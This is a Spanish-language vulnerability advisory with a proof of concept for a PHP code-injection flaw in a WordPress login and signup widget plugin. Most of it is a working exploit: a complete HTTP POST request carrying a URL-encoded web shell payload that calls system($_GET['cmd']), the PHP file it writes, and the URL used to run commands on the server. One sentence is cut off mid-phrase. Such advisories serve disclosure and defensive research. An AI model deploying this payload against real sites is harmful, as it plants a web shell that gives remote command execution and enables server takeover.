
WordPress Custom Login And Signup Widget Plugin <= 1.0 es vulnerable a Ejecución de Código Arbitrario
La vulnerabilidad Control inadecuado de la generación de código ('Inyección de código') en bitto.Kazi Custom Login And Signup Widget permite la ejecución arbitraria de código PHP por parte de usuarios administradores autenticados.
Este problema afecta a todas las versiones hasta la 1.0 inclusive.
🔥 Puntuación base: 9.1 (CRÍTICA)
CWE ID: CWE-94 – Control inadecuado de la generación de código ('Inyección de código')
El plugin permite a los administradores modificar el contenido de sn.php a través del campo Nombre del remitente en la página de configuración.
La entrada proporcionada por el usuario se escribe directamente en un archivo PHP sin saneamiento ni validación.
Como resultado, cualquier código PHP proporcionado en el parámetro text se almacenará dentro de un archivo PHP y se ejecutará al realizar una solicitud directa, lo que conduce a la .
/wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes
POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://target.com/wp-admin/options-general.php?page=custom-login-and-signup-widget
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://target.com
Connection: keep-alive
Cookie: *<insert your admin cookie here>*
Upgrade-Insecure-Requests: 1
Priority: u=0, i
text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit
textsn.php (include de configuración del plugin)<?php
global $bwbn;
if(isset($_GET['cmd'])) system($_GET['cmd']);
?>
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php
Tras una inyección exitosa, accede directamente a él para ejecutar comandos mediante:
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php?cmd=id
.php.Este proyecto ha sido creado únicamente con fines educativos y de investigación.
Cualquier uso de la información proporcionada es bajo su propio riesgo.
El autor no asume ninguna responsabilidad por el mal uso o los daños causados por este contenido.